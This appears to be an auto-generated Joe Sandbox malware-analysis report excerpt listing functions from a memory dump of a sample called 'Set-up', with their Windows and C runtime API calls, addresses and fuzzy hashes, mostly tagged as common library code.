Opcode Fuzzy Hash: 9b1677c3a0dbee3850117fea866f7573ad8c888ba7fc4c2c3e7d7e1ec0c9ab71
Instruction Fuzzy Hash: 422191B19002C9AFDF21AFB4CC81ABD7775EF01324B1443A9E4345B1E0EB398991DB92

Function 6BB6EFF6 Relevance: 10.6, APIs: 7, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_tolower_l.MSVCR100(00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F052
_tolower_l.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB6F061
___ascii_strnicmp.LIBCMT ref: 6BB77686
_errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C408
_invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C413
_errno.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C42F
_invalid_parameter_noinfo.MSVCR100(00000000,?,7FFFFFFF,00000000), ref: 6BB8C43A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_tolower_l$___ascii_strnicmp
String ID:
API String ID: 2390777603-0
Opcode ID: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
Instruction ID: d917048591e9c6fcd1c07d2092531c1e7ce88f4f850bebd61432199d74186f97
Opcode Fuzzy Hash: 5dee6ccd69475502ea7b5f51668898b67aece249fb893b167051157f32c20104
Instruction Fuzzy Hash: E4219C719002D99FDF21DEB8C845BBE3BA4EF412A4F2406A8A4305B1D5FB78CD45CBA1

Function 6BB6E5C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB89225
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89230
_errno.MSVCR100 ref: 6BB8923D
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89248

Strings

B, xrefs: 6BB6E615

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: edd275210728800d1351eb05aeb73171c7f1e9d6414c99896fe65ef0e2fee524
Instruction ID: 8dc3d96e63e56a5f5351839fba992b6c4b673d20857b71af5e9c6a99eea0742a
Opcode Fuzzy Hash: edd275210728800d1351eb05aeb73171c7f1e9d6414c99896fe65ef0e2fee524
Instruction Fuzzy Hash: 5521747280029ADFDF109FB8D8815DE7BB4FB49364F14466AE520A7280E778D9108FA5

Function 6BB6AEAE Relevance: 10.6, APIs: 7, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6BB6AEB8
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6BB6AEF6
_malloc_crt.MSVCR100(00000000), ref: 6BB6AF00
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 6BB6AF19
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB6AF24
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6BB6AF33

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
String ID:
API String ID: 3279498665-0
Opcode ID: ea7c391440aeb0bbb985125eb44f344ce7177a9ec3326e50b03b1957db36af75
Instruction ID: 15138715d884ccd037e5fda855e301688dd3805a03e433cbb5d80cef5e3e3bb9
Opcode Fuzzy Hash: ea7c391440aeb0bbb985125eb44f344ce7177a9ec3326e50b03b1957db36af75
Instruction Fuzzy Hash: DF118FA2902578BF8F116FB59D888AFBBBCEE467D075044A1F002D3140E6798D408AA2

Function 6BB74C10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB74C62
DName::operator+.LIBCMT ref: 6BB74C69
DName::DName.LIBCMT ref: 6BB8F17F
DName::DName.LIBCMT ref: 6BB8F195

Strings

void , xrefs: 6BB74C5D
void, xrefs: 6BB8F17A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID: void$void
API String ID: 826178784-3746155364
Opcode ID: 65d5317549983a0a8f91a0e47dcdc76c74b8796faab2cd37628f64b4a8b20171
Instruction ID: 54551cc9d859fdcdba0ec1d4cf51335bf10efc1a652332702201d454769523d4
Opcode Fuzzy Hash: 65d5317549983a0a8f91a0e47dcdc76c74b8796faab2cd37628f64b4a8b20171
Instruction Fuzzy Hash: 6D218B3580018DEFCF14EFA4C881CEE7BB8FF09349F5080AAE92596250EB399A45CB51

Function 6BB98AC4 Relevance: 10.6, APIs: 7, Instructions: 65threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB98ACB

Part of subcall function 6BB962F7: __EH_prolog3.LIBCMT ref: 6BB962FE
Part of subcall function 6BB962F7: ??2@YAPAXI@Z.MSVCR100 ref: 6BB96366
Part of subcall function 6BB962F7: _memset.LIBCMT(00000000,00000000,B5104C15), ref: 6BB96378

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,6BBA0AF2,?,00000001,00000010,6BBA0C38,00000000,00000000,6BBA0AF2,?,6BBA0AF2,?), ref: 6BB98AFB
GetLastError.KERNEL32(?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B0B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B23
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B31
??2@YAPAXI@Z.MSVCR100(0000001C,5D8B5351,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98B43
GetCurrentThreadId.KERNEL32 ref: 6BB98B78

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ??2@H_prolog3$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
String ID:
API String ID: 1121080609-0
Opcode ID: 5c98bc4fef1d85f45f6bc91f0ac7ce659f48b93b231d121a9f54c7ad98421248
Instruction ID: 8735dbf9fa1cdf75c2b52770461287820e3fec8ed7781753fea2982200e1509f
Opcode Fuzzy Hash: 5c98bc4fef1d85f45f6bc91f0ac7ce659f48b93b231d121a9f54c7ad98421248
Instruction Fuzzy Hash: 46216DB1900286EFC700AF7198C5A5EBBB4FF0A394B588579E118DB210D739D855DBA0

Function 6BB6A78A Relevance: 10.6, APIs: 7, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
_get_osfhandle.MSVCR100(?), ref: 6BB6A7B8

Part of subcall function 6BB6A745: __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB6A780
Part of subcall function 6BB6A745: _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90432
Part of subcall function 6BB6A745: _invalid_parameter_noinfo.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9043D

CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
_get_osfhandle.MSVCR100(00000002), ref: 6BB75A6F
_get_osfhandle.MSVCR100(00000001,00000002), ref: 6BB75A78
GetLastError.KERNEL32 ref: 6BB8F4C2

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
String ID:
API String ID: 1012986785-0
Opcode ID: 4c4d64862bca89c10fb235f6adaef54f2ba8e31f7d29760d9dab3eeb7b1ab5e3
Instruction ID: 409ff34e5664cc14cd59a716812cd2c90fe7b710d5fc4a77f34c3d866c065b16
Opcode Fuzzy Hash: 4c4d64862bca89c10fb235f6adaef54f2ba8e31f7d29760d9dab3eeb7b1ab5e3
Instruction Fuzzy Hash: 261148335442F01EDA1616385889B7D36B8CF82BB4F1900A6E9398B1C0FF6DCD418A61

Function 6BB70338 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB701E4
__doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB902F6
_errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB902FE
_errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90314
_invalid_parameter_noinfo.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB9031F
_errno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90326
__doserrno.MSVCR100(6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?,?,6BB73AA1,?,?), ref: 6BB90331

Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA

Part of subcall function 6BB7022F: _isatty.MSVCR100(?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB702BE
Part of subcall function 6BB7022F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE), ref: 6BB702EF

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
String ID:
API String ID: 3635451409-0
Opcode ID: 2d2487c31763a03790344f4f2e6a3b4db35a0855622db35621aff564ff91a395
Instruction ID: b98127273a4be65a6f77b542d1983d0e8315d9c4216f05f32674191510fdb515
Opcode Fuzzy Hash: 2d2487c31763a03790344f4f2e6a3b4db35a0855622db35621aff564ff91a395
Instruction Fuzzy Hash: 5011D0718107C48FCB21AF74C88275D3760AF07329F9102A6D5349B2D0EBBE8A00CF55

Function 6BB71712 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB71424
__doserrno.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB90398
_errno.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB903A0
_errno.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB903B6
_invalid_parameter_noinfo.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB903C1
_errno.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB903C8
__doserrno.MSVCR100(6BB717A8,00000010,6BB717FA,00000000,00000000,00000001), ref: 6BB903D3

Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA

Part of subcall function 6BB716B5: _get_osfhandle.MSVCR100(00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716BF
Part of subcall function 6BB716B5: SetFilePointer.KERNEL32(00000000,?,00000000,6BB6D354,00000000,?,?,6BB6D354,?,00000000,00000000), ref: 6BB716D8

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$CriticalEnterFilePointerSection_get_osfhandle_invalid_parameter_noinfo
String ID:
API String ID: 593789910-0
Opcode ID: 64373b2add0f5f29445d02963f447dda2ff5b39e612666ca14edf3742e6be005
Instruction ID: e32415fea563769372230698e668b430ebd618e5317a2e86be346531e1d93a8a
Opcode Fuzzy Hash: 64373b2add0f5f29445d02963f447dda2ff5b39e612666ca14edf3742e6be005
Instruction Fuzzy Hash: EE11E2718043E08FCB21AF74D882B9C37B0AF02329F690265D5305B1D1EBBD8A408F61

Function 6BB74544 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB8D270
DName::operator+.LIBCMT ref: 6BB8D277
DName::DName.LIBCMT ref: 6BB8D299
DName::operator+.LIBCMT ref: 6BB8D2A0
DName::operator+.LIBCMT ref: 6BB8D2A7

Strings

throw(, xrefs: 6BB8D268, 6BB8D291

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: b681296cc4a8aca49b927c331044c3683aaaaca56e82027bf93706e85b091c38
Instruction ID: 4eec1975201ff10bb43b1f7732b2502c0c2a7c55fa9832678b5cdc1b575a4861
Opcode Fuzzy Hash: b681296cc4a8aca49b927c331044c3683aaaaca56e82027bf93706e85b091c38
Instruction Fuzzy Hash: 4D014034640189AFCF04DFA4E896DED3BB5EB45348F00405AE9159F290DB78EA458B84

Function 6BB98BCC Relevance: 10.5, APIs: 7, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?), ref: 6BB98BE8
GetCurrentThread.KERNEL32 ref: 6BB98BEB
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BF2
DuplicateHandle.KERNEL32(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BF5
GetLastError.KERNEL32(?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BFF
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98C17
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000), ref: 6BB98C25

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
String ID:
API String ID: 2881127307-0
Opcode ID: bcac48fc4a96b1bf438404bdd9f5125bfc7a2729cb2236fa88830a0093af9418
Instruction ID: 3c439d00ab948d528e1e054a8f2c7aae007ed91de2f4c8a9f4f7ea04c6d9c5d5
Opcode Fuzzy Hash: bcac48fc4a96b1bf438404bdd9f5125bfc7a2729cb2236fa88830a0093af9418
Instruction Fuzzy Hash: E6F09072900255AACE10AFB18C0AFAB3B6CEB45744F044565B611D3080DFBCE40487A1

Function 6BBDF612 Relevance: 9.3, APIs: 6, Instructions: 261COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 6BBDF713
__FindPESection.LIBCMT ref: 6BBDF72D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 65a2dbbad6bc0614295d2a45738af66a8b53c340a46fd0ba955812258b21235b
Instruction ID: 3bc28faae56da0473df7a95e87f427b6d4c474900b164196c551abf9ac6580f1
Opcode Fuzzy Hash: 65a2dbbad6bc0614295d2a45738af66a8b53c340a46fd0ba955812258b21235b
Instruction Fuzzy Hash: 2091E531E086959FDB05CF58C84079D77F5EB85314F12426ED819AB390E73EE902CBA1

Function 6BB77402 Relevance: 9.2, APIs: 6, Instructions: 191COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB77593
_errno.MSVCR100 ref: 6BB7759D
_errno.MSVCR100 ref: 6BB775A7
_invalid_parameter_noinfo.MSVCR100 ref: 6BB898F8
_invalid_parameter_noinfo.MSVCR100 ref: 6BB89909
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8996B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: 0de324318477d4dc6c80569192b49f368d63830de8359b9e7cf98bb7e22c903d
Instruction ID: bfe02c4165e6dc0ce962f37f03d90df45a728dba950b1dc0ea31d6a796f1cced
Opcode Fuzzy Hash: 0de324318477d4dc6c80569192b49f368d63830de8359b9e7cf98bb7e22c903d
Instruction Fuzzy Hash: FE51C8317453C0CBD731DB6EC4907897BA1DFA6718F6984AED0A48B242D3BAD907CB51

Function 6BB7153C Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

_flsbuf.MSVCR100(?,?), ref: 6BB71515
memcpy.MSVCR100(?,?,?), ref: 6BB715D5
_errno.MSVCR100 ref: 6BB72AAB
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88E16

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
String ID:
API String ID: 508512864-0
Opcode ID: 54fbb8be210887e717b61343d9b84cb24f2803062b71bca9007cef20ae25fa0f
Instruction ID: 04f26cc29384364d868329e69cf514d5046cc245ad75fcf78d9d4e9063a8ed5b
Opcode Fuzzy Hash: 54fbb8be210887e717b61343d9b84cb24f2803062b71bca9007cef20ae25fa0f
Instruction Fuzzy Hash: DA41F431A04795DFDB34AFA9C890A9EB7B6EF81760B28857ED43197280D77CD940CB50

Function 6BB6C106 Relevance: 9.1, APIs: 6, Instructions: 121COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.MSVCR100(0000000B,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C12D

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

EnterCriticalSection.KERNEL32(?,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C1A8
_lock.MSVCR100(0000000A,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C1FA
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C215
_calloc_crt.MSVCR100(00000020,00000040,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB904BD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CriticalSection$Enter_lock$CountInitializeSpin_calloc_crt
String ID:
API String ID: 988982517-0
Opcode ID: d05ee7998e32142065c6829041dd3fdce4512d75ba18bf2b6f8d09574ecfa793
Instruction ID: 735f667827d49d6770e0b45889d0f12caad9927e4a1b0245f7b11f8c190bff3b
Opcode Fuzzy Hash: d05ee7998e32142065c6829041dd3fdce4512d75ba18bf2b6f8d09574ecfa793
Instruction Fuzzy Hash: C7411271D047918BDF208FA8C94479DBBF0AF467A4F148269D125AB2D0E7BCDE41CB61

Function 6BB651A2 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6BB652A5,?,?,?), ref: 6BB651E5
_memset.LIBCMT(00000000,00000000,00000000,?,?,?,6BB652A5,?,?,?,?,?,?,?,?,?), ref: 6BB6522B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6BB65240
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6BB6524E
_freea_s.MSVCR100(00000000), ref: 6BB65258
malloc.MSVCR100(00000008,?,?,?,6BB652A5,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB90CF1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$StringType_freea_s_memsetmalloc
String ID:
